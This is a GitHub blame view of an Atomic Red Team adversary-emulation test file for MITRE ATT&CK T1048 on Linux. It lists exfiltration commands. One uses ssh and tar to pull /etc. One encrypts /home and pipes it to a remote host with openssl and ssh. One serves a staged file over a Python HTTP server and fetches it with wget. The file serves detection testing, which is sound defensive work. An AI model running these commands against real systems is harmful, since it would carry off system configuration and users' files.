Files
atomic-red-team/Linux/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
T

31 lines
834 B
Markdown
Raw Normal View History

## Exfiltration Over Alternative Protocol
2018-02-08 17:01:34 +11:00
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
### SSH
Remote to Local:
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Local to Remote:
2018-02-08 17:05:23 +11:00
tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'
2018-02-08 17:01:34 +11:00
2018-03-15 17:03:14 -05:00
### HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt